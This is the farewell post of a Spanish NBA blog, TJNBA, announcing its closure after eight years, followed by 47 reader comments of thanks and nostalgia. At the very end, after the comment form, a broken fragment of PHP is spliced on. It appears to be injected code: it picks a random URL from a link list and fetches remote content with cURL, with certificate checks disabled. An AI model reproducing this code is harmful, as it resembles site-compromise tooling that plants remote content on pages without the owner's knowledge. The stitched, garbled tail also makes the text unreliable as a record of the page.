Reflexiones sobre la bocina: Bocinazo Final

20 de July de 2015 por MagicJohnson32

Situémonos por un momento en septiembre de 2007. Todavía existían los Sonics, Biedrins aún parecía un jugador de baloncesto, entre Kobe Bryant y LeBron James sumaban los mismos MVP que Smush Parker, Greg Oden era la gran esperanza de los Blazers y leíamos en medios especializados comparaciones entre Jianlian y Kevin Garnett. Un buen día de aquel septiembre de 2007, concretamente el 18/09/2007, nacía este blog.

Han pasado muchas cosas y cerca de 8 años desde que inaugurásemos TJNBA preguntándonos si el proyecto en que nos embarcábamos llegaría a alguna parte y si alguien emprendería ese incierto viaje junto a nosotros. Equipados únicamente con una pasión por la NBA desmesurada, dimos aquel paso inicial sin mayor objetivo que tratar sobre ella como a nosotros nos gustaría que nos la explicasen.

Creemos que estamos en condiciones de afirmar que el objetivo se ha cumplido. A lo largo de las ocho campañas transcurridas, hemos procurado que el blog recogiese análisis, opinión y sobre todo información libre de sensacionalismo, de chovinismo… de todo aquello, en resumen, que contamina buena parte de la cobertura de la NBA que realizan los grandes medios españoles.

Hemos tenido la fortuna de que la vida de TJNBA ha coincido con momentos y jugadores extraordinarios y ha sido un verdadero privilegio narrar aquí sus hazañas. Debutamos junto a Kevin Durant el año del MVP de Kobe Bryant, asistimos al anillo de Dirk Nowitzki y al resurgir de los Celtics, vivimos intensamente el back-to-back de Pau Gasol con los Lakers y el reinado de LeBron en Miami, y aún nos duran el asombro ante la vida eterna de los Spurs y el flechazo por Steph Curry. Han sido ellos, como protagonistas, y vosotros, como lectores y partícipes, los responsables de aliviarnos el esfuerzo que suponía la labor diaria de actualizar el blog. Sois, en definitiva, los culpables de que el blog haya llegado tan lejos.

Pero -supongo que ya lo habréis adivinado- hasta aquí ha llegado TJNBA. Nos gustaría decir que esto no es un adiós sino un hasta luego, pero eso sería mentir. Nos despedimos con tanta tristeza como convencimiento de que las condiciones personales de cada uno de los integrantes del equipo TJ hacen inviable otro año con el nivel de dedicación que exige el blog y que vosotros os merecéis. De hecho, el último par de temporadas lo hemos sacado adelante de mala manera, a costa de un cierto descenso en la calidad y cantidad de los artículos con honrosísimas excepciones que debemos agradecer a nuestros colaboradores. Sin ellos, esto habría acabado mucho antes y de una manera más indigna.

De eso precisamente, de despedirse con dignidad, tratan estas líneas, las últimas palabras que escribiremos y que leeréis en TJNBA. Lo dejamos convencidos de que no nos queda alternativa y, sin embargo, no podemos evitar la decepción que nos produce saber que no explicaremos en este foro lo que está por venir. Saber que no estaremos para despedir a leyendas aún hoy activas como Duncan, Garnett o Bryant, que no necesitaremos ampliar nuestro vocabulario en busca de adjetivos con los que calificar a Anthony Davis, que no volveremos a equivocarnos con los Hornets/Bobcats/Pelicans… Habría sido bonito mantenernos en activo otros ocho años, y después ocho más, los suficientes para seguir las ascensiones al estrellato de los Wiggins, Antetokounmpo, Towns y compañía, para comprobar si Anthony Bennett encuentra una profesión más acorde con sus capacidades y si Joel Embiid llega a jugar un partido con los Sixers. Y, por qué no, ver a nuestro ídolo TJ Kidd debutar en la NBA.

Pero no será así. Nos despedimos. Lo hacemos hinchados de agradecimiento hacia los que en algún momento de estos ocho años habéis estado ahí. Si alguno cree que no podrá resistir la vida sin TJNBA, que no desespere: vamos a seguir explicando la NBA a nuestra manera aunque en formato corto a través de nuestra cuenta de twitter, https://twitter.com/blogtjnba. Quién sabe, tal vez un día la NBA nos contrate y podamos ganarnos la vida con esto que durante ocho años hemos hecho por puro amor al baloncesto. Si no es así, ha sido un placer.

We’ll always love this game.

Comenta

47 comentarios a esta entrada

  1. ralage dice:
    #1

    Jo, pues que pena…
    Yo os descubrí cuado me empezó a picar esto del basket buscando x google contenido en español y os he seguido desde ese tiempo, que si la porra, las crónicas y sus premios, el comentar las jornadas los fines de semana, los artículos pre draft, y las reflexiones sobre la bocina…se van a echar de menos :((

      Citar

  2. Spirit dice:
    #2

    Hace tiempo que no entro en el foro, ejercí poco de manager en vuestras ligas y creo que nunca comenté aquí…. pero me entristece un montón esta despedida.
    Como le he comentado a Magic antes, ya no sabré que hacer cada mañana de temporada NBA al despertarme. Leer vuestra crónica era una tradición.
    Habéis hecho un trabajo sensacional. Vuestras publicaciones eran muy buenas con unas dosis de humor que yo siempre agradecía. Ojalá hubiesen más webs de este estilo. Podéis estar orgullosos de vuestra obra.
    ¡Hasta pronto!

      Citar

  3. Spirit dice:
    #3

    Eso sí…. Kevin Ollie siempre molará más que vosotros. Tampoco os flipéis.
    😛

      Citar

  4. Diestro dice:
    #4

    Entro a comentar con gran tristeza pero es totalmente entendible. Habéis sido para mi la página de referencia para seguir la nba y para aprender cada dia un poquito sobre baloncesto.

    Solo puedo daros las gracias por estos años y desearos lo mejor de aquí en adelante.

      Citar

  5. Pep15 dice:
    #5

    A más de uno nos dejáis huérfano, qué pena. En todo caso gracias por vuestra dedicación y, hasta siempre!

      Citar

  6. HisRoyalAirness dice:
    #6

    Hace aproximadamente 6 años, yo era un friki que vivía su pasión con la NBA bajando vídeos de antiguos partidos en el jdownloader de páginas ya inexistentes y navegando por blogs, algunos innombrables. Un día, en el blog de Daimiel, descubrí vuestro enlace.
    Comencè a leer los artículos “históricos” y me quedé prendado por la calidad del contenido.
    Tardé aún casi un año en empezar a participar en el foro pero desde aquella no ha faltado un día que no me despertase y fuese el primer sitio al que acudiese.
    Durante largas temporadas he tenido con Deer, Txus, Viva, Magic, Denise y tantos otros conversaciones que duraban días y semanas en post interminables.
    Gente con la que pasar el rato, con quien hablar de una pasión a diario y que, llegado el momento, me permitieron aportar un pequeño granito de arena del que siempre estaré muy orgulloso.
    En lo personal este lugar de encuentro ha sido a veces la única vía de escape del ajetreo diario, hasta dos rupturas sentimentales dolorosas y de un examen MIR que me ha llegado a convertir en médico. Días de encontrar aquí un sitio en el que charlar y sentirse cómodo cuando no tienes más a mano que tu móvil.
    Siempre formaréis una pequeña parte de mi vida, (creo que más de uno pensará igual, aunque suene cursi) estoy enormemente agradecido de todo los ratos en que me habéis acompañado y de todo lo que he aprendido con vosotros.
    Os deseo lo mejor a todos.

      Citar

  7. HisRoyalAirness dice:
    #7

    PD: por favor, no cerréis la página, hay oro puro para horas y horas de lectura

      Citar

  8. Carlos dice:
    #8

    Una putada la que me hacéis, que me informaba por aquí de cada jornada de partidos en la NBA. Me arrojáis directamente en los brazos de MARCA, donde ese rebote de Calderón o esa recuperación de Victor Claver siempre son lo más importante de sus partidos.

    La verdad es que he participado poco aquí, os seguía por RSS, pero sí me apunté a las dos últimas porras y de hecho la penúltima casi la gano. Tenía ya mis quinielas para la próxima.

    Muchas gracias por todo.

      Citar

  9. belisario dice:
    #9

    Un plaver haber compartido estos últimos cuatro años von vosotros, pese a que sí la cantidad, nunca vi menguar la calidad. Mucha suerte a todos en vuestras respectivas vidas.
    Aunque yo nunca acabaré en Marca como Carlos, me quedaré con mi otro marcador del navegador, el de SomosBasket.

      Citar

  10. Catalan TimberTrolls dice:
    #10

    Moltíssima sort.
    No descarteu que, el que no heu aconseguit amb el Blog, ho acabeu reeixint amb el Twitter…

    De entrada, jo us segueixo…

      Citar

  11. knopflerin dice:
    #11

    Soy Knopflerin.

    No sé si os acordáis de mi de cuando empezamos con la ya célebre TJLeague.

    Me desligué en su momento, pero los últimos 2 años os había empezado a seguir otra vez, sois unos cracks, aunque eso ya lo sabéis, os mando un abrazo y mucho animo y os seguiré en Twitter sin duda.

    Un saludo.

      Citar

  12. Blade Petrovic dice:
    #12

    Un gran vacío se me queda, pues nos quedamos sin el mejor blog de NBA. Simplemente gracias

      Citar

  13. Ruxixón dice:
    #13

    Y yo que pensaba ganar la porra del año que viene,pedir la camiseta de Dellavedova y que me la firmara Jose Luis…

    Ahora en serio,un orgullo haber participado en él,tanto a nivel comentarios como en un puñado de artículos los 2 últimos artículos.Os deseo lo mejor en vuestras vidas,vosotros habéis formado parte de la mía durante los últimos años.Muchas gracias por ello.

      Citar

  14. Vicente_Pisha dice:
    #14

    Un abrazo enorme para todos. Sois muy grandes.

      Citar

  15. dunc dice:
    #15

    Joder que pena!

    Muchas gracias por todo, habéis sido un gran blog de nba, sin duda. Yo os echaré mucho de menos.

    Un abrazo a todos!!

      Citar

  16. Schize dice:
    #16

    Vaya bajón me acaba de entrar leyendo esto… Son muchos años leyéndoos día a día, disfrutando del mejor blog de NBA en castellano que he podido encontrar. El curso que viene seguro sentiré que algo le falta a mi rutina. Se os va a echar mucho de menos. Gracias por todo.

      Citar

  17. Faju dice:
    #17

    Si hacemos un crowdfunding tendremos unos “mocks” para el draft del 2016?

    Me quedo con la frase “sobre todo información libre de sensacionalismo”.

    Hasta siempre!

      Citar

  18. Vader dice:
    #18

    Que pena de verdad, se os echará mucho de menos!! Era una de las primeras páginas que leia cada día. Infinito agradecimiento a todos los responsables y colaboradores del blog!!

    Malditos!! No hareis articulo del proximo anillo de los Knicks con canasta ganadora de Porzingis!!! 😀

      Citar

  19. Rompe dice:
    #19

    Que pena, ¡después de tantos años! Solo me queda agradecerles, de corazón, el (mucho) tiempo que habéis dedicado a este proyecto para que gente como yo lo disfrutara. Un abrazo fuerte y espero que solo sea un “hasta luego”.

      Citar

  20. Joaquin dice:
    #20

    Empece a leer hace 5 años aproximadamente en TJNBA. Entraba una vez por semana, religiosamente, a veces más, dependiendo el contenido, si playoff o regular. Disfrute mucho de leerlos y, sobre todo, les agradezco el compromiso que han tenido con esta página, sólo por el amor al Basket., que hace que personas como yo y otros mas aca, le hayamos puesto el ojo con gran cariño.

    PD: Extraño, pero es la primera vez que escribo ;P y la ultima.

    Ha sido un lujo. Lo mejor.

      Citar

  21. ibrah09 dice:
    #21

    Os he leído durante años, años y años… y años, y es algo que he hecho cada mañana para informarme de la jornada nocturna de nba. Muchas gracias por todos vuestros artículos y espero que os vaya todo bien, que os lo merecéis.

      Citar

  22. Pablo dice:
    #22

    Creo que casi nunca he comentado pero os leo desde hace años. Se os va a echar mucho de menos, un fuerte abrazo

      Citar

  23. Sancho88 dice:
    #23

    Despues de mi hija y de mi actual pareja, la TJNBA es lo mas grande que me ha ocurrido jamas. Ademas me permitisteis traspasar una puerta privilegiada y eterna. El blog ha sido muy grande, y sois todos muy grandes: Deer, Txus, Magic, Viva, Denise, Simon, Melo y todos los que alguna vez habeis aportado vuestro granito de arena. Larga vida al blog, una de las aventuras mas bonitas de mi vida, que abandone hace un par de años pero siempre publique articulos cuando pude con mi toque de humor. Hoy todos
    sentimos que un amigo muy muy especial nos abandona. Cuantas horas me abre pasado leyendo comentarios y discusiones nocturnas… ni se sabe

      Citar

  24. Sancho88 dice:
    #24

    Y por que no decirlo, Txus, Deer y Magic se merecen un agradecimiento eterno. Nos habeis hecho muy muy felices. No se me ocurre nada mas aue decir. Bueno… si. Larga vida a la TJNBA y Samardo Samuels presidente del planeta tierra. Adios genios. Sois gente irremplazable en mi vida

      Citar

  25. Larry Bird 33 dice:
    #25

    Solo he escrito algunos comentarios esta última temporada pero os leo desde hace muchos años, me será duro no ver vuestros magníficos análisis cada mañana y no leer los comentarios que gente como Txusma, Deer, Magic, Triceratops (antes Denise) etc publicaban, los cuales siempre aportaban algo e iban con la mejor de las intenciones, gracias especialmente a Triceratops que es con el que más he debatido por ser de los Magic al igual que yo.
    Bueno ya me despido mil gracias por todo y como habéis dicho we’ll always love this game.

      Citar

  26. Jose Viruete dice:
    #26

    Madre mia. Que palo. No recuerdo cuando empecé a leeros, pero sois grandísimos culpables de que me volviera a enganchar a la NBA. Leeros a diario ha sido imprescindible para estar al tanto de lo que pasaba. Yo hubiera hecho por participar en algo tipo Pantreon para apoyar la página si lo que necesitábais era cuartos.
    En fin. Un abrazo fortísimo y gracias por estar aquí todo este tiempo.

      Citar

  27. kreakone dice:
    #27

    Vaya bajón!! Ni me acuerdo ya del tiempo que llevo enganchado al blog, se convirtió en rutina actualizar compulsivamente el link del blog a partir de las 10 de cada mañana esperando vuestro resumen de la jornada anterior. Se me hace un pequeño nudo en el estómago al pensar que ya no estaréis ahí cada mañana ;(
    Entiendo que es un trabajo muy grande, simplemente agradeceros enormemente todo lo que habéis hecho durante todos estos años! Ha sido un placer leeros!!

    MUCHÍSIMAS GRACIAS!!!

    PD: Apoyo totalmente la iniciativa del crowfunding! Pagaría gustósamente para seguir leyendo vuestros artículos 😉

      Citar

  28. Triceratops dice:
    #28

    Gracias a los responsables de esta página por tantas horas de lectura y debate. Un placer!

      Citar

  29. Triceratops dice:
    #29

    Larry Bird 33:
    gracias especialmente a Triceratops que es con el que más he debatido por ser de los Magic al igual que yo.

    De nada hombre, no obstante yo no soy responsable ni miembro fundador de esta página, creo que son Txusma, Deer y Magicjohnson y es a ellos a quien hay que darles las gracias

      Citar

  30. underlock dice:
    #30

    Muchos años leyendoos y disfrutando de vuestros artículos, espero que consigáis alguna forma de mantener el blog, sino, agradecimiento eterno, gracias por todo.

      Citar

  31. M dice:
    #31

    Muchísimas gracias por todo. Habéis sido mi página de referencia NBA y deportiva este tiempo. Entiendo el cansancio. Sentíos orgullosos. Un fuerte abrazo.

      Citar

  32. TheAnswer dice:
    #32

    Mil gracias por todos estos años

      Citar

  33. laker1624 dice:
    #33

    Pues si que es un palo.

    Todo lo que me viene a la cabeza ya lo han escrito en comentarios anteriores (que si habéis sido mi página de referencia a la hora de seguir la NBA, que cada mañana estaba al acecho esperando la crónica de turno, etc.), así que simplemente os agradezco todo vuestro esfuerzo y dedicación y os deseo muchísima suerte de aquí en adelante.

    Y por mucho que digáis que últimamente habíais bajado el nivel del blog, yo os digo que eso son pamplinas, y que nos habéis hecho disfrutar hasta el último día!

    Sois grandes!

      Citar

  34. Rodri dice:
    #34

    Nunca he colaborado con comentarios en el blog pero os he seguido desde el principio. Me habéis enseñado, me habéis acompañado y me he emocionado junto a vosotros. Muchas gracias y espero que alguna vez nos volvamos a cruzar en el camino.

      Citar

  35. charlestone dice:
    #35

    Gracias, amigos internautas!! Se os echará mucho de menos
    Hasta siempre

      Citar

  36. Nacho dice:
    #36

    Muchas gracias, un placer….
    y podría seguir, pero creo que está todo dicho. Por años comentando, por años leyéndoos, por algún artículo que aceptasteis (me ilusionaba y todo)
    y supongo que será duro para vosotros, para nosotros también
    mil abrazos
    jeje, ahora recuerdo esas finales de los Lakers con Vujevic finiquitando el partido con tiros libres y comentándolo por aquí… desde entonces un divorcio, otra niña, zarandeos laborales, pero tjnba cada mañana.
    Buscaré otra página donde comentéis los que por aquí paráis.
    Seguiré el twiter, si me hago a ese cacharro.
    enga, va, que dan ganas de llorar….
    Los más grandes, desde que, como le pasó a HisRoyal, Daimiel me desvió hacia vosotros

      Citar

  37. luismi_vallecas dice:
    #37

    Nunca he comentado mucho, pero llevo leyéndoos desde hace 5 temporadas. Voy a cumplir 18 años dentro de poco y me habéis ayudado a que me enganche a la NBA, vuestras crónicas son de lo mejorcito en español. La verdad es que se echará de menos leeros nada más llegar a casa. Mucha suerte a todos!

      Citar

  38. franitis dice:
    #38

    Sin lugar a dudas el mejor blog de NBA en español. Hoy es un día triste para los que os seguimos, yo desde hace unos tres años, pero me he leído bastantes páginas atrás, sobretodo las del big three de los Celtics, añorando tiempos pasados… Unas crónicas magníficas y exquisitamente escritas. Os deseo lo mejor.

      Citar

  39. rumbero dice:
    #39

    Pues yo llevo un tiempo algo desconectado y sin comentar mucho, pero esta seguía siendo la primera página (después del As obviamente ¬¬’) que abría para enterarme de como andaba el tema.
    Solo queda daros las gracias por el trabajo realizado y por la manera como lo habéis hecho, dejando colaborar a unos cuantos locos que nos hemos ido juntando por aquí y creando un sitio diferente del resto donde hablar sobre NBA.
    Nos vemos por el twitter gente. Un abrazo, se os echará de menos

    PD: Sancho, este año me abono para ver al Barça. Samardo’s time!!!

      Citar

  40. Nico dice:
    #40

    Enorme pena al leer vuestras últimas líneas.

    Muchísima suerte en todo lo que os propongáis. Os sobra talento.

    GRACIAS TOTALES

      Citar

  41. jhc dice:
    #41

    Jooo que penaa tio, erais mi pagina preferida para leer sobre NBA, os deseo lo mejor a todos, espero que al menos continueis con las ligas hoops que quiero salir del pozo de la B

    Lo dicho mucha suerte a todos en el futuro y ojalá volvais algún año con la misma ilusion que cuando comenzasteis

      Citar

  42. fofer dice:
    #42

    Ha sido un auténtico placer leeros cada día, os echaré de menos. Mil gracias.

      Citar

  43. Lucho dice:
    #43

    Una triste noticia, pero agradecido por todo lo que fue el blog. Me entra la nostalgia, gracias por todo. El mejor blog de la NBA desde mi opinion, con los brillantes comentarios que tenia dia a dia, ademas de los magnificos informes y balances que hacian periodicamente. Y mi pagina NBA de cabecera, ya que entraba todas las mañanas a leerlos, desde Argentina. Se los va a echar mucho de menos. Comentaba poco, pero los leia absolutamente siempre. Y si comentaba poco era porque realmente mi nivel no esta a la altura del nivel general de la pagina, y preferia aprender de ustedes.
    Magnifico laburo

    Algun consejo de por donde seguir la actualidad de la temporada? Cronicas, balances, o lo que sea

    Muchas gracias saludo grande, seguire viendolos por twitter

      Citar

  44. GreenPride dice:
    #44

    Un dia muy triste para mi este del cierre. Era el sitio web donde seguia cada dia mi deporte favorito. Incluso tuve el privilegio de firmar la crónica de un partido de las finales. Os echaré de menos.
    Muchas gracias por todos esos años de sensaciones y buen basket. Que os vaya genial! !!

      Citar

  45. lluc33 dice:
    #45

    Mucha suerte en la vida!
    Un blog pionero y de mucha calidad. Participé varias ocasiones pero no fallaba en el status diario.
    Para aquellos huerfanos que quieran algo más que Marca… También estan basket4us y nbamaniacs, son más comerciales pero para quitar el mono diario no estan mal.
    Gracias por todo!!
    Un abrazo

      Citar

  46. Rompe dice:
    #46

    ¡Cómo se os echa de menos!

      Citar

  47. franitis dice:
    #47

    Otra temporada más sin vosotros… No es lo mismo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>